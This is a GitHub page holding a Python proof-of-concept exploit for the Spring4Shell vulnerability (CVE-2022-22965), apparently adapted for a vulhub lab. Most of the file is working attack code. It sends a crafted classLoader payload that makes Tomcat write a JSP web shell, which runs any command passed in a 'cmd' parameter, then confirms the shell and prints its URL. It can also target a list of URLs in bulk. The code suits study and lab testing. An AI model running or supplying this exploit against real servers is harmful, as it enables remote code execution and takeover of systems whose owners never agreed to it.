forked from crow821/crowsec
-
Notifications
You must be signed in to change notification settings - Fork 0
/
vulhub_CVE-2022-22965_poc.py
64 lines (52 loc) · 3.17 KB
/
vulhub_CVE-2022-22965_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#coding:utf-8
#
import requests
import argparse
from urllib.parse import urljoin
def title():
print('+------------------------------------------')
print('[+] \033[34mGithub : https://github.com/crow821/ \033[0m')
print('[+] \033[34m公众号 : 乌鸦安全 \033[0m')
print('[+] \033[34m功 能: Spring_vulhub_CVE-2022-22965_poc.py \033[0m')
print('[+] \033[34m说明: 该脚本来源于https://github.com/BobTheShoplifter/Spring4Shell-POC,在此基础上修改而来 \033[0m')
print('[+] \033[34m注意事项: 该检测脚本仅限Spring_vulhub_CVE-2022-22965 \033[0m')
print('[+] \033[34m注意事项: 检测并非无损检测,会不断的往里面写文件,请勿频繁操作 \033[0m')
print('[+] \033[34m注意事项: 请遵循网络安全法,遵纪守法!!! \033[0m')
print('[+] \033[36m使用格式: python3 Spring_vulhub_CVE-2022-22965_poc.py --url=http://127.0.0.1:8080 \033[0m')
print('+------------------------------------------')
def Exploit(url):
headers = {"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
"DNT":"1",
"Content-Type":"application/x-www-form-urlencoded"
}
data = "?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
print(url)
# res = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
res = requests.get(url=(url+data),headers=headers,timeout=15,allow_redirects=False, verify=False)
# print(res.status_code)
# print(res.text)
shellurl = urljoin(url, 'tomcatwar.jsp')
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
except Exception as e:
print(e)
pass
def main():
parser = argparse.ArgumentParser(description='Spring-Core Rce.')
parser.add_argument('--file',help='url file',required=False)
parser.add_argument('--url',help='target url',required=False)
args = parser.parse_args()
if args.url:
Exploit(args.url)
if args.file:
with open (args.file) as f:
for i in f.readlines():
i = i.strip()
Exploit(i)
if __name__ == '__main__':
title()
main()